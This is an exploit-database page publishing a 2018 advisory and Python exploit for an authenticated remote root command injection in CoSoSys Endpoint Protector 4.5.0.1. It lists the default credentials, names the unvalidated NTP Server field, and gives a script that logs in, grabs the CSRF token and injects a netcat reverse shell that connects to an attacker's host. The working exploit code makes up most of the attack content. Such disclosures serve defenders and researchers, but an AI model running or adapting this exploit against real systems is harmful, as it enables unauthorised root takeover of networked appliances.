CoSoSys Endpoint Protector 4.5.0.1 Remote Root Command Injection

2018.08.03
Credit: 0x09AL
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection # Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018 # Author : 0x09AL # Tested on : Endpoint Protector 4.5.0.1 # Software Link : https://www.endpointprotector.com/ # Vulnerable Versions : Endpoint Protector <= 4.5.0.1 # Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011 # In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically. # The command may take a while to execute. import requests exp = requests.session() user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' username = 'root' password = 'epp2011' host = 'x.x.x.x.x' rev_host = 'x.x.x.x' rev_port = '443' r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False) shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port) payload = '&& %s' % shell print payload if(r.text.find("Welcome Guest")>0): print "[-] Incorrect credentials [-]" else: print "[+] Logged in successfully [+]" r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False) if(r.text.find("csrf")>-1): print "[+] Getting CSRF Token [+]" csrf_token = r.text.split('value="')[1].split('">')[0] print "[+] Token: %s [+]" % csrf_token post_data = { 'csrf_token' : csrf_token, 'continent' :'Europe', 'region' :'Berlin', 'timeSetting[ntpserver]' : payload, 'timeSetting[timesync]' :'12' } r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False) print "[+] Sending exploit [+]" if(r.text.find("nc")>-1): post_data = { 'ntpserver': payload, 'continent' :'Europe', 'region' :'Berlin' } r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False) print "[+] Exploit success [+]"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top